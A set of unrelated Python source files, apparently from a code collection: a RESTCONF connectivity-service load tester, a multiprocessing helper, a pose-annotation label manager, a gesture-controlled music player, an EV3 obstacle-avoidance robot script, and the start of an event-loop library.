connection = ConnectivityServiceData()
connection.inter_arrival_time = s_next
connection.uuid = cs_uuid
connection.type = 'DELETE'
self.delete_cs(connection)
def delete_cs(self, connection):
start_ht = millis()
time.sleep(connection.inter_arrival_time)
self.total_holding_time = self.total_holding_time + connection.inter_arrival_time
check_ht = millis() - start_ht
if check_ht/1000 < 1:
connection.ber = False
connection.start_TS = millis()
try:
endpoints = self.endpoints['occupied'][connection.uuid]
except Exception as e:
print(str(e))
print(self.endpoints['occupied'])
url = "http://" + ip + "/restconf/config/context/connectivity-service/" + connection.uuid
print('SEND delete cs: {}'.format(connection.uuid))
response = requests.delete(url)
connection.end_TS = millis()
if response.status_code != 200:
print('Error delete cs: {} -> {}'.format(connection.uuid, response.json()['description']))
connection.result = response.json()['description']
print(response.content)
else:
print('Successful delete cs: {}'.format(connection.uuid))
connection.result = response.json()['description']
del self.endpoints['occupied'][connection.uuid]
self.endpoints['available'][connection.uuid] = endpoints
self.log.append(connection)
self.n_threads = self.n_threads - 1
def exit_function(self):
print('exit_function')
self.end_time = millis()
while self.n_threads != 0:
sleep(0.5)
print('Ending test')
spect_error = 0
path_error = 0
created = 0
deleted = 0
delete_error = 0
no_ber = 0
self.log.sort(key=lambda x: x.start_TS, reverse=False)
with open('results/log_{}_a{}_h{}_c{}.csv'.format(millis(), lmb_inv, mu_inv, connections), 'w') as filehandle:
print('WRITING log')
filehandle.write("Parameters:\n -N connections: %s\n -Inter arrival rate: %s(s)\n -Holding time: %s(s)\n" % (self.max_connections, lmb_inv, mu_inv))
for connection in self.log:
if connection.result == 'No spectrum':
spect_error = spect_error+1
elif connection.result == 'No route':
path_error = path_error + 1
elif connection.result == 'OK' and connection.type == 'CREATE':
created = created + 1
elif connection.result == 'OK' and connection.type == 'DELETE':
deleted = deleted + 1
elif connection.result != 'OK' and connection.type == 'DELETE':
delete_error = delete_error + 1
else:
print('Should not enter here')
print(connection)
if not connection.ber and connection.type == 'DELETE':
no_ber = no_ber + 1
filehandle.write("%s\t\t%s\t\t%s\t\t%s\t\t%s\t\t%s\t\t%s\n" % (connection.start_TS, connection.inter_arrival_time, connection.end_TS, connection.type, connection.result, connection.ber, connection.uuid))
filehandle.write("Successfully created: %s\n" % created)
filehandle.write("Successfully deleted: %s\n" % deleted)
filehandle.write("Spectrum error: %s\n" % spect_error)
filehandle.write("Path errors: %s\n" % path_error)
filehandle.write("Error deleting: %s\n" % delete_error)
filehandle.write("Error no BER: %s\n" % no_ber)
assert created+spect_error+path_error == self.max_connections
filehandle.write("Blocking probability: %s\n" % float((spect_error+path_error)/(created+spect_error+path_error)))
running_time = float(self.end_time-self.start_time)/1000
filehandle.write("%s connections in %s seconds\n" % (self.max_connections, running_time))
cps = self.max_connections/running_time
filehandle.write("%s connections created per second\n" % (created/running_time))
filehandle.write("Average interarrival time: %s\n" % cps)
filehandle.write("Average holding time: %s\n" % (self.total_holding_time/deleted))
filehandle.write("Erlangs: %s\n" % erlang)
print('WRITTEN')
# sys.argv[1] = IP@ to send the requests
# sys.argv[2] = Inter arrival time in seconds
# sys.argv[3] = Holding time in seconds
# sys.argv[4] = total number of requests
if __name__ == "__main__":
ip = sys.argv[1] + ':4900'
lmb_inv = float(sys.argv[2])
mu_inv = float(sys.argv[3])
connections = float(sys.argv[4])
total_holding_time = 0
lmb = 1/lmb_inv
mu = 1/mu_inv
erlang = lmb*mu_inv
print('Starting')
print('\tIp: {}'.format(ip))
print('\tInter arrival time: {} seconds --> Lambda: {}'.format(lmb_inv, lmb))
print('\tHolding time: {} seconds --> Mu: {}'.format(mu_inv, mu))
print('\tErlangs: {}'.format(erlang))
print('\tTotal connections: {}'.format(connections))
connectivity = Connectivity(lmb, connections)
input('Start?')
connectivity.start()
|
gmproc.py |
import multiprocessing as mp
import time
class Workers:
def __init__(self):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
def add(self, id, target, params=None):
self.targets[id] = ProcessWrapper(id, target, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
def run(self, ids=None):
if ids is None:
ids = self.targets.keys()
prs = []
for k in ids:
p = self.targets[k]
pr = mp.Process(target=p.run, args=(p.id, self.queue, p.params))
prs.append(pr)
pr.start()
for _ in range(len(prs)):
id, value = self.queue.get()
self.results[id] = value
return self.results
def _run_client(cw, id, queue, params):
cw.run(id, cw.queue, queue, params)
def _run_server(sw, cqueue, queue, params):
sw.run(cqueue, queue, params)
class ClientServer:
def __init__(self, server, clients_delay = 0.1):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
self.server = ServerWrapper(server)
self.clients_delay = 0.1
def new_worker(self, id, worker_type, params=None):
self.targets[id] = ClientWrapper(id, worker_type, params)
def new_workers(self, nb_workers, worker_type, params=None):
for idx in range(nb_workers):
self.targets[idx] = ClientWrapper(idx, worker_type, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
def run(self, ids=None, params=None):
if ids is None:
ids = self.targets.keys()
cqueue = {}
for k in ids:
p = self.targets[k]
pr = mp.Process(target=_run_client, args=(p, p.id, self.queue, p.params))
cqueue[p.id] = p.queue
p.process = pr
pr.start()
ps = mp.Process(target=_run_server, args=(self.server, cqueue, self.queue, params))
ps.start()
time.sleep(self.clients_delay)
ps.join()
for k in ids:
c = self.targets[k]
for key in cqueue.keys():
cqueue[key].close()
if c.process is not None:
c.process.join()
c.queue.close()
self.queue.close()
class ProcessWrapper:
def __init__(self, id, target, params=None):
self.id = id
self.target = target
self.params = params
def run(self, id, queue, params):
value = self.target(params)
queue.put( (id, value) )
class ClientWorker:
def __init__(self):
pass
def start(self, params):
pass
def process(self):
pass
def update(self):
pass
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWorker:
def __init__(self):
pass
def start(self, params):
pass
def process(self, id, msg):
return None
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWrapper:
def __init__(self, target):
self.target = target
def run(self, cqueue, squeue, params):
obj = self.target()
obj.start(params)
while not obj.done():
id, msg = squeue.get()
response = obj.process(id, msg)
if response is not None:
cqueue[id].put(response)
obj.wait()
obj.finish()
class ClientWrapper(ProcessWrapper):
def __init__(self, id, target, params=None):
super().__init__(id, target, params)
self.queue = mp.Queue()
self.process = None
self.params = params
def run(self, id, cqueue, squeue, params):
obj = self.target(id)
obj.start(self.params)
while not obj.done():
msg = obj.process()
squeue.put( (id, msg) )
response = cqueue.get()
obj.update(response)
obj.wait()
obj.finish()
|
labels.py | import os
import shutil
import threading
import time
from functools import lru_cache
from glob import glob
from queue import SimpleQueue
from typing import Dict, Literal, Tuple, cast, Optional, List
import numpy as np
import pandas as pd
from fastapi import FastAPI
from ..utils import get_project_path, deepmerge, get_project_config, ProjectConfig
from ..utils.conversion import ensure_multi_index
# frame -> individual -> bodypart -> coords
LabelsCoords = Dict[Literal["x", "y"], Optional[float]]
LabelsBodyparts = Dict[str, LabelsCoords]
LabelsIndividuals = Dict[str, LabelsBodyparts]
LabelsModel = Dict[str, LabelsIndividuals]
LabelsGroups = Dict[Tuple[str, str], LabelsModel]
class LabelManager:
def __init__(self):
self.queue: "SimpleQueue[LabelsGroups]" = SimpleQueue()
self.shutdown_event = threading.Event()
def add(self, project: str, video: str, labels: LabelsModel):
self.queue.put({(project, video): labels})
def _worker(self):
while not self.shutdown_event.is_set():
groups: LabelsGroups = {}
for _ in range(self.queue.qsize()):
item = self.queue.get()
deepmerge(item, groups)
for (project, video), item in groups.items():
self.write_labels(project, video, item)
# write at most once per second
time.sleep(1)
@staticmethod
def get_labels(project, video) -> LabelsModel:
"""Retrieve labelled points of each frame for a given video."""
name = os.path.splitext(video)[0]
paths = glob(
get_project_path(project, "labeled-data", name, f"CollectedData_*.h5")
)
if len(paths) == 0:
return {}
if len(paths) == 1:
path = paths[0]
else:
config = get_project_config(project)
if not config:
return {}
path = get_project_path(
project, "labeled-data", name, f"CollectedData_{config.scorer}.h5"
)
if not os.path.exists(path):
return {}
df: pd.DataFrame = cast(pd.DataFrame, pd.read_hdf(path)).replace({np.nan: None})
output = {}
multi_animal = "individuals" in df.columns.names
for image in df.index:
# support old data format
if not isinstance(df.index, pd.MultiIndex):
image_name = os.path.basename(image)
else:
image_name = image[-1]
output.setdefault(image_name, {})
if multi_animal:
for i in range(0, len(df.columns), 2):
individual = df.columns[i][1]
bodypart = df.columns[i][2]
output[image_name].setdefault(individual, {})
output[image_name][individual][bodypart] = {
"x": df.loc[image][df.columns[i]],
"y": df.loc[image][df.columns[i + 1]],
}
else:
output[image_name]["individual1"] = {
df.columns[i][1]: {
"x": df.loc[image][df.columns[i]],
"y": df.loc[image][df.columns[i + 1]],
}
# iterate by 2's, so we can grab x,y pairs
for i in range(0, len(df.columns), 2)
}
return output
@staticmethod
def get_labelled_count(labels: LabelsModel) -> int:
"""Returns the number of frames which have at least one point labelled."""
def has_labels(frame_: str) -> bool:
for bodyparts in labels[frame_].values():
if any(c["x"] or c["y"] for c in bodyparts.values()):
return True
count = 0
for frame in labels:
if has_labels(frame):
count += 1
return count
@staticmethod
def _reindex_dataframe(
labels: LabelsModel,
config: ProjectConfig,
name: str,
df: Optional[pd.DataFrame] = None,
):
images = [("labeled-data", name, image) for image in labels]
if df is not None:
images = list(set(images) - set(df.index))
if not images:
return df
new_df: Optional[pd.DataFrame] = None
a = np.empty((len(images), 2))
a[:] = np.nan
for individual in config.individuals or ["individual1"]:
for bodypart in config.bodyparts:
if config.multi_animal:
cols = pd.MultiIndex.from_product(
[[config.scorer], [individual], [bodypart], ["x", "y"]],
names=["scorer", "individuals", "bodyparts", "coords"],
)
else:
cols = pd.MultiIndex.from_product(
[[config.scorer], [bodypart], ["x", "y"]],
names=["scorer", "bodyparts", "coords"],
)
index = pd.MultiIndex.from_tuples(images)
frame = pd.DataFrame(a, columns=cols, index=index)
new_df = pd.concat([new_df, frame], axis=1)
if df is not None:
new_df = pd.concat([df, new_df], axis=0)
new_df.sort_index(inplace=True)
return new_df
def write_labels(self, project, video, labels: LabelsModel):
name = os.path.splitext(video)[0]
base_path = get_project_path(project, "labeled-data", name)
backup_path = os.path.join(base_path, "backups")
config = get_project_config(project)
if not config:
raise Exception(f"config file missing for project: '{project}'")
scorer = config.scorer
path_hdf = os.path.join(base_path, f"CollectedData_{scorer}.h5")
path_csv = os.path.join(base_path, f"CollectedData_{scorer}.csv")
os.makedirs(backup_path, exist_ok=True)
df: Optional[pd.DataFrame]
if os.path.exists(path_hdf):
# load dataframe from disk
df = cast(pd.DataFrame, pd.read_hdf(path_hdf))
ensure_multi_index(df)
# add new images to dataframe
df = self._reindex_dataframe(labels, config, name, df)
else:
# create new data frame
df = self._reindex_dataframe(labels, config, name)
if df is None:
return
for image, individuals in labels.items():
image_path = ("labeled-data", name, image)
for individual, bodyparts in individuals.items():
for bodypart, coords in bodyparts.items():
for coord, value in coords.items():
if config.multi_animal:
key = (scorer, individual, bodypart, coord)
else:
key = (scorer, bodypart, coord)
df.loc[image_path][key] = value
# create backups before writing the files
def create_backup(path, suffix, overwrite=False):
if not os.path.exists(path):
return
backup_target = os.path.join(backup_path, os.path.basename(path) + suffix)
if overwrite or not os.path.exists(backup_target):
shutil.copy2(path, backup_target)
create_backup(path_hdf, ".original")
create_backup(path_csv, ".original")
create_backup(path_hdf, ".bak", overwrite=True)
create_backup(path_csv, ".bak", overwrite=True)
# save to disk
df.to_csv(path_csv)
df.to_hdf(path_hdf, "df_with_missing")
def _start(self):
threading.Thread(target=self._worker).start()
def _close(self):
self.shutdown_event.set()
def register_events(self, app: FastAPI):
app.add_event_handler("startup", self._start)
app.add_event_handler("shutdown", self._close)
@lru_cache()
def get_label_manager():
return LabelManager()
|
music_player.py | import os
from typing import List
from numpy.lib.function_base import msort
from pygame import mixer
from random import shuffle, triangular
from tkinter import Listbox, Tk, Button, Label
import socket
import time
import torch
import numpy as np
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from threading import Thread
class Classifier(nn.Module):
def __init__(self):
super(Classifier, self).__init__()
self.layer1 = nn.Linear(600, 1024)
self.layer2 = nn.Linear(1024, 256)
self.layer3 = nn.Linear(256, 64)
self.out = nn.Linear(64, 17)
self.act_fn = nn.ReLU()
def forward(self, x):
x = self.layer1(x)
x = self.act_fn(x)
x = self.layer2(x)
x = self.act_fn(x)
x = self.layer3(x)
x = self.act_fn(x)
x = self.out(x)
return x
def get_device():
return 'cuda' if torch.cuda.is_available() else 'cpu'
model_path = (r"C:\Users\jscmb\es_data\model.ckpt") #change this path to where you store the model.ckpt
device = get_device()
print("device:", device)
model = Classifier().to(device)
model.load_state_dict(torch.load(model_path))
# Initialize the window and the mixer
window = Tk()
window.title("Easy music player with gesture detection")
mixer.init()
song_box = Listbox(window, bg = 'black', fg = 'green', width = 60)
# song_box.pack(pady = 60)
# get list of files
os.chdir(r"C:\Users\jscmb\songs") #change this to your song list's direction
playlist = os.listdir()
active_playlist = playlist
shuffled_playlist = []
nonshuffled_playlist = playlist
# Get number of files
file_range = len(playlist) - 1
# Settings variables used to control play logic
music_option = True
shuffle_music = False
indexed_track = 0
display_track = indexed_track + 1
is_stopped = False
is_paused = False
is_started = False
repeat_track = False
stop_reacting = False
def volumedown():
volume = mixer.music.get_volume()
if volume >= 0.1:
volume = volume - 0.1
else:
volume = 0
# volume = volume - 1.0
mixer.music.set_volume(volume)
print("Set volume to ", mixer.music.get_volume())
def volumeup():
volume = mixer.music.get_volume()
volume = volume + 0.1
# volume = volume - 1.0
mixer.music.set_volume(volume)
print("Set volume to ", mixer.music.get_volume())
# Shuffle music logic
def shuffle_playlist():
global shuffle_music, playlist, is_started, shuffled_playlist, indexed_track, is_stopped, active_playlist
indexed_track = 0
if shuffle_music:
shuffle_music = False
active_playlist = playlist
else:
shuffle_music = True
shuffle(playlist)
shuffled_playlist = playlist
os.chdir(r"C:\Users\jscmb\songs") #change this to your song list's direction
playlist = os.listdir()
update_display()
mixer.music.pause()
start_music()
# Repeat one or all logic
def repeat_loop():
global repeat_track
if not repeat_track :
repeat_track = True
repeat_button.config(text="🔂")
else :
repeat_track = False
repeat_button.config(text="🔁")
# Updates the display values of the current track number and name
def update_display():
global display_track
display_track = playlist.index(active_playlist.__getitem__(indexed_track)) + 1
track_num_display.config(text=f"Track: {display_track}")
track_name_display.config(text=f"Now Playing:\n{active_playlist.__getitem__(indexed_track)}")
music_playing = music_status()
if music_playing:
start_button.config(text="⏸️")
# Else it was paused so unpause and mark paused flag as False
else:
start_button.config(text="▶️")
# Logic to run music
def start_music():
global indexed_track, is_started, is_stopped, active_playlist
# Determine if random or normal play
if shuffle_music:
active_playlist = shuffled_playlist
else:
active_playlist = playlist
# If music is not already playing, it has not been stopped or paused then grabs next song in queue
while not mixer.music.get_busy() and not is_stopped and not is_paused and not is_started:
mixer.music.load(f"{active_playlist.__getitem__(indexed_track)}")
mixer.music.play()
is_started = True
# While music is playing check every 100 milliseconds if music track has finished playing and re-trigger music.
if mixer.music.get_busy():
window.after(100, start_music)
else:
# Repeat logic
if not is_paused:
# Repeat one logic reduce index call by 1 prior to adding 1 so always stay on same track
if repeat_track:
indexed_track -= 1
# Else it is repeating all
indexed_track += 1
is_started = False
# Checks to make sure track is not skipped past last song or into negative.
if indexed_track < 0 or indexed_track > file_range:
indexed_track = 0
# Update the display with current track info
update_display()
# Repeat music
start_music()
# Gets the current status of the music player
def music_status():
music_yes = mixer.music.get_busy()
return music_yes
# Stop the music from playing. If already stopped then it resets repeat status and the playlist
def stop_music():
global is_stopped, is_started, indexed_track, repeat_track
if is_stopped:
indexed_track = 0
repeat_track = False
update_display()
mixer.music.stop()
is_stopped = True
is_started = False
start_music()
# Skip to next track
def next_track():
global indexed_track, is_started, is_paused
# If music is playing stop it and move it to the next track and start again
is_paused = False
mixer.music.stop()
if indexed_track == file_range:
indexed_track = 0
is_started = False
start_music()
update_display()
# Skip to last track
def prev_track():
global indexed_track, is_started, is_paused
# If music is playing stop it move to prior track or if on first track move to last track.
is_paused = False
if display_track == 1:
indexed_track = file_range
is_started = False
else:
indexed_track -= 2
mixer.music.stop()
start_music()
update_display()
# Play or pause logic
def play_track():
global is_paused, is_stopped
music_playing = music_status()
# If music is playing then pause it and mark the paused flag as True
if music_playing:
is_paused = True
mixer.music.pause()
start_button.config(text="▶️")
# Else it was paused so unpause and mark paused flag as False
else:
is_paused = False
mixer.music.unpause()
start_button.config(text="⏸️")
# Mark stopped as False and start music
is_stopped = False
start_music()
# When user not using UI, repaeatedly update
def update_status():
update_display()
window.after(1000, update_status)
window.after(1000, update_status)
# Control buttons
previous_button = Button(text="⏮", font=("", 12, ""), command=prev_track)
previous_button.grid(row=2, column=0)
start_button = Button(text="⏯", font=("", 12, ""), command=play_track)
start_button.grid(row=2, column=1)
next_button = Button(text="⏭", font=("", 12, ""), command=next_track)
next_button.grid(row=2, column=2)
repeat_button = Button(text="🔄", font=("", 12, ""), command=repeat_loop)
repeat_button.grid(row=3, column=3)
shuffle_button = Button(text="🔀", command=shuffle_playlist)
shuffle_button.grid(row=3, column=2)
volume_up_button = Button(text = "🔊", font=("", 12, ""), command=volumeup)
volume_up_button.grid(row=3, column=1)
volume_down_button = Button(text = "🔈", font=("", 12, ""), command=volumedown)
volume_down_button.grid(row=3, column=0)
# Displayed information
track_num_display = Label(text=f"Track: {display_track}")
track_name_display = Label(text=f"Now Playing:\n{active_playlist.__getitem__(indexed_track)}")
track_num_display.grid(row=0, column=1, columnspan=2)
track_name_display.grid(row=1, column=0, columnspan=4)
HOST = '172.20.10.13' # Standard loopback interface address, change this to your ip address of wifi
PORT = 65431 # Port to listen on (use ports > 1023)
class music_player(Thread):
def __init__(self):
Thread.__init__(self)
self.daemon = True
self.start()
def run(self):
while True:
window.update_idletasks()
window.update()
def server_socket():
global stop_reacting
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
sample_num = 0
s.listen(1)
print("listening...")
conn, addr = s.accept()
print('Connected by', addr)
with conn:
music_playing = music_status()
if not music_playing:
mixer.music.load(f"{active_playlist.__getitem__(indexed_track)}")
mixer.music.play()
while True:
print("Connected! Waiting for data...")
count = 0
data = []
try:
N = int(conn.recv(1024).decode('utf-8'))
except:
print('wrong connection, restart.')
continue
while count < N:
temp = conn.recv(1024).decode('utf-8')
#print('Received from socket server : ', temp)
temp = temp.split()
for i in range(len(temp)):
data.append(int(temp[i]))
count += int(len(temp)/3)
sample_num += 1
for j in range(len(data), 600):
data.append(data[-3])
if len(data) > 600:
print("Your Gasture is too long to detected! Please try again.")
else:
# with open(r"C:\Users\jscmb\es_data\data_LTb.txt", "a") as dt:
# for i in data:
# dt.write(str(i))
# dt.write(" ")
data = np.array(data)
data = torch.from_numpy(data).float()
output = model(data)
_, data_pred = torch.max(output, 0)
data_pred = int(data_pred)
print(data_pred)
if stop_reacting == 0:
if data_pred == 0:
prev_track()
print("Gasture detected: last song")
elif data_pred == 1:
next_track()
print("Gasture detected: next song")
elif data_pred == 2:
volumeup()
print("Gasture detected: volume up")
elif data_pred == 3:
volumedown()
print("Gasture detected: volume down")
elif data_pred == 4:
play_track()
music_playing = music_status()
if music_playing:
print("Gasture detected: play")
else:
print("Gasture detected: pause")
elif data_pred == 5:
repeat_loop()
if repeat_track:
print("Gasture detected: repeat song")
else:
print("Gasture detected: not repeat song")
elif data_pred == 6:
shuffle_playlist()
if shuffle_music:
print("Gasture detected: random playlist")
else:
print("Gasture detected: ordered playlist")
elif data_pred == 7:
stop_reacting = True
print("Gasture detected: you've stop to detect the gesture, waving the stop gesture again to enable the detection")
elif data_pred == 8:
print("Gasture detected: equalizer setting 1")
elif data_pred == 9:
print("Gasture detected: equalizer setting 2")
elif data_pred == 10:
print("Gasture detected: equalizer setting 3")
else:
if data_pred == 7:
stop_reacting = False
print("Gasture detected: you've enable the gesture detection")
else:
print("You've stop to detect the gesture, waving the stop gesture again to enable the detection")
if __name__ == "__main__":
t2 = Thread(target = server_socket)
t2.setDaemon(True)
t2.start()
window.mainloop()
while True:
print("somthing wrong...")
pass |
main.py | #!/usr/bin/env pybricks-micropython
from pybricks import ev3brick as brick
from pybricks.ev3devices import Motor, TouchSensor, UltrasonicSensor, GyroSensor
from pybricks.parameters import Port, Direction, Color
from pybricks.tools import print, wait
from pybricks.robotics import DriveBase
from threading import Thread
from server import *
import socket
import sys
run = True
def main():
drive_speed = 200
s3.reset_angle(0)
# half_scan = [45, -90, 45]
half_scan = [45, -45]
# full_scan = [90, -45, -90, -45, 90]
full_scan = [90, 45, -45, -90]
while run == True:
if s1.pressed() == True:
wait(1000)
t = Thread(target=batterychk)
t.start()
robot.drive(drive_speed, 0)
# add check angle and modify you can slow one motor or the other to straighten
while run == True:
# if s2.distance() < 300:
# print("Detected obsticle ahead {}".format(s2.distance()))
# robot.stop()
# direction = vision_scan(type = "full", scan_lst = [90, -45, -45, -45, -45])
# print(type(direction))
# print("returned {}".format(direction))
# avoid_obs(direction)
# robot.drive(drive_speed, 0)
result = vision_scan(type="half", center_pt=45, scan_lst=half_scan)
print(result)
if result == "None":
pass
elif result > -5 or result < 5:
print("Detected obsticle ahead {}".format(s2.distance()))
robot.stop()
direction = vision_scan(type="full", center_pt=90, scan_lst=full_scan)
# print(type(direction))
# print("returned {}".format(direction))
avoid_obs(direction)
robot.drive(drive_speed, 0)
elif result > -50 or result < -40:
avoid_obs(direction=45)
elif result < 50 or result > 40:
avoid_obs(direction=-45)
# while s3.angle() != 0:
# print("Not straight")
# if s3.angle() < 0:
# robot.drive(0, -150)
# else:
# robot.drive(0, 150)
# robot.drive(drive_speed, 0)
wait(700)
def control_srv():
# Create a TCP/IP socket
# ipaddr = socket.socket.gethostbyname(socket.gethostname())
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# print(ipaddr)
# Bind the socket to the port
serversocket.bind(("192.168.1.165", 8000))
# print('starting up on %s port %s' % server_address)
serversocket.listen(5)
while True:
# establish a connection
clientsocket, addr = serversocket.accept()
print("Got a connection from %s" % str(addr))
msg = 'Thank you for connecting' + "\r\n"
clientsocket.send(msg.encode('ascii'))
# clientsocket.close()
def vision_scan(type=None, center_pt=None, scan_lst=None):
# print(scan_lst)
motor_speed = 150
wait_time = 10
# center.reset_angle(0)
# turn_degree = 90
# scan_lst = [90, -45, -45, -45, -45]
dist_lst = {}
for line in scan_lst:
# print("Scan {}".format(line))
center.run_target(motor_speed, line)
wait(10)
# angle_dif = line - center.angle()
# print(angle_dif)
# center.run_angle(motor_speed, angle_dif)
# wait(10)
dist_lst[center.angle()] = s2.distance()
wait(10)
center.run_target(motor_speed, 0)
# wait(10)
# if center.angle() < 0:
# center.run(150)
# while center.angle() < 0:
# wait(1)
# elif center.angle() > 0:
# center.run(-150)
# while center.angle() > 0:
# wait(1)
# center.stop()
# wait(10)
angle_diff = 0 - center.angle()
print(angle_diff)
center.run_target(motor_speed, angle_diff)
dist_lst[center.angle()] = s2.distance()
# wait(10)
# print(dist_lst)
if type == "full":
result = max(dist_lst.values())
for key, value in dist_lst.items():
if result == value:
return key
else:
print(dist_lst)
for key in dist_lst:
print(dist_lst[key])
if dist_lst[key] < 500:
return key
else:
pass
return "None"
def avoid_obs(direction=None):
s3.reset_angle(0)
print("Current Angle: {}".format(s3.angle()))
robot.drive_time(-150, 0, 1000)
if direction > 0:
robot.drive(0, -150)
while direction > s3.angle():
# pass
wait(1)
else:
robot.drive(0, 150)
while direction < s3.angle():
# pass
wait(1)
robot.drive(200, 0)
return
def batterychk():
while True:
print("Battery level {}".format(brick.battery.voltage()))
if brick.battery.voltage() < 5000:
run = False
robot.stop()
print("Battery Low {}".format(brick.battery.voltage()))
brick.display.text("Battery Low", (60, 50))
while True:
brick.light(Color.RED)
brick.sound.beep()
wait(500)
brick.light(None)
brick.sound.beep()
# brick.sound.speak("Battery Low")
wait(500)
wait(2000)
if __name__ == "__main__":
# Setup ports
left = Motor(Port.B, Direction.COUNTERCLOCKWISE)
right = Motor(Port.A, Direction.COUNTERCLOCKWISE)
center = Motor(Port.D, Direction.CLOCKWISE)
robot = DriveBase(left, right, 56, 114)
s1 = TouchSensor(Port.S2)
s2 = UltrasonicSensor(Port.S1)
s3 = GyroSensor(Port.S3)
# main()
# rotation_chk()
control_srv()
# print(vision_scan(type="full", scan_lst=[90, -45, -45, -45, -45, 90]))
# print(vision_scan(type="half", scan_lst=[45, -45, -45, 45]))
|
__init__.py | # -*- coding: utf-8 -*-
# Copyright (c) Sebastian Klaassen. All Rights Reserved.
# Distributed under the MIT License. See LICENSE file for more info.
import abc
import collections
import collections.abc
import datetime
import enum
import inspect
import logging
import sys
import threading
import os
import queue
import warnings
__all__ = [
'all_', 'animate', 'any_', 'Awaitable', 'AbstractEventLoop', 'Event',
'find_parent', 'Frame', 'FrameMeta', 'FrameStartupBehaviour',
'FreeEventArgs', 'get_current_eventloop_index', 'InvalidOperationException',
'hold', 'PFrame', 'Primitive', 'sleep'
]
__version__ = '2.2.0'
class ThreadLocals(threading.local):
def __init__(self):
self.__dict__['_current_eventloop'] = None
self.__dict__['_current_frame'] = None
_THREAD_LOCALS = ThreadLocals()
class FrameStartupBehaviour(enum.Enum):
delayed = 1
immediate = 2
class InvalidOperationException(Exception):
"""Raised when operations are performed out of context.
Args:
msg (str): Human readable string describing the exception.
"""
def __init__(self, msg):
super().__init__(msg)
class FreeEventArgs(object):
"""Event arguments returned by the :attr:`Frame.free` event.
Attributes:
cancel (bool): Setting this to True, cancels the event.
"""
def __init__(self):
self.cancel = False
class _AtomicCounter(object):
"""A thread-safe counter that calls a function whenever it hits zero.
Args:
initial_value (int): The initial counter value.
on_zero (Callable): The function to call whenever the counter hits zero.
"""
def __init__(self, initial_value, on_zero):
self._lock = threading.Lock()
self._value = initial_value
self.on_zero = on_zero
self.on_zero_args = ()
def add(self, f):
"""Increment the counter by the given amount."""
with self._lock:
self._value += f
if self._value != 0: return
self.on_zero(*self.on_zero_args)
def sub(self, f):
"""Decrement the counter by the given amount."""
with self._lock:
self._value -= f
if self._value != 0: return
self.on_zero(*self.on_zero_args)
class AbstractEventLoop(metaclass=abc.ABCMeta):
"""Abstract base class of event loops."""
@abc.abstractmethod
def _run(self):
"""Start the newly created or stopped event loop.
This method must be overwritten by the concrete eventloop class.
Events can be posted or invoked before the eventloop is started.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _stop(self):
"""Stop the running event loop.
This method must be overwritten by the concrete eventloop class.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _close(self):
"""Close the stopped event loop.
This method must be overwritten by the concrete eventloop class.
The eventloop will not be restarted and no events will be posted or invoked after this method is called.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _clear(self):
"""Clear all pending events from the stopped event loop.
This method must be overwritten by the concrete eventloop class.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _post(self, delay, callback, args):
"""Execute the given callback after ``delay`` seconds.
This method must be overwritten by the concrete eventloop class.
This function is **not** threadsafe. It is only called from the thread that this eventloop was started on.
See :meth:`AbstractEventLoop._invoke` for the threadsafe version of this method.
Args:
delay (float): The time to wait before executing the callback.
callback (function): The function to be called.
args (tuple): The arguments to pass to the callback.
"""
raise NotImplementedError # pragma: no cover
@abc.abstractmethod
def _invoke(self, delay, callback, args):
"""Execute the given callback after ``delay`` seconds.
This method must be overwritten by the concrete eventloop class.
This function **is** threadsafe. It can be called from any thread.
See :meth:`AbstractEventLoop._post` for the unsafe version of this method.
Args:
delay (float): The time to wait before executing the callback.
callback (function): The function to be called.
args (tuple): The arguments to pass to the callback.
"""
raise NotImplementedError # pragma: no cover
def _spawnthread(self, target, args):
"""Create and start a daemonic worker thread.
By default, this will create and start a ``threading.Thread``.
The concrete eventloop class can overwrite this method to use a different threading model.
Args:
target (function): Same as the ``target`` argument of ``threading.Thread``.
args (tuple): Same as the ``args`` argument of ``threading.Thread``.
Returns:
The created thread.
"""
thread = threading.Thread(target=target, args=args, daemon=True)
thread.start()
return thread
def _jointhread(self, thread):
"""Wait until the given thread terminates.
Only threads created with :meth:`AbstractEventLoop._spawnthread` are awaited with this method.
Args:
thread: The thread to wait for.
"""
thread.join()
def __init__(self):
self._idle = True
self._eventloop_affinity = self
self._result = None
self._exception = None
def run(self, frame, *frameargs, num_threads=0, **framekwargs):
if num_threads <= 0: # If no specific number of threads was requested, ...
# Default num_threads to the number of available CPU cores
try:
# Try to get the number of available CPU cores this process is restricted to
num_threads = len(os.sched_getaffinity(0))
except:
num_threads = 0
if num_threads <= 0: # If the number of CPU cores couldn't be determined, ...
try:
# Try to get the number of available CPU cores
import multiprocessing
num_threads = multiprocessing.cpu_count()
except:
num_threads = 0
if num_threads <= 0: # If the number of CPU cores still couldn't be determined, ...
num_threads = 4 # Fall back to 4 threads
if _THREAD_LOCALS._current_eventloop is not None:
raise InvalidOperationException("Another event loop is already running")
_THREAD_LOCALS._current_eventloop = self
eventloop_queue = queue.Queue()
self.event_queue = queue.Queue()
def worker_thread(parent_eventloop):
eventloop = parent_eventloop.__class__()
eventloop.event_queue = parent_eventloop.event_queue
_THREAD_LOCALS._current_eventloop = eventloop
eventloop_queue.put(eventloop)
eventloop._run()
eventloop._close()
workers = [self._spawnthread(target=worker_thread, args=(self,)) for i in range(num_threads - 1)]
# Collect an array of all eventloops and distribute that array among all eventloops
self.eventloops = [self]
for worker in workers: self.eventloops.append(eventloop_queue.get())
for eventloop in self.eventloops[1:]: eventloop.eventloops = self.eventloops
self._idle = False
self._result = None
self._exception = None
try:
mainframe = frame(*frameargs, **framekwargs)
if not mainframe.removed:
mainframe._listeners.add(self) # Listen to mainframe finished event
self._run()
except:
raise
else:
if self._exception:
raise self._exception
else:
return self._result
finally:
_THREAD_LOCALS._current_eventloop = None
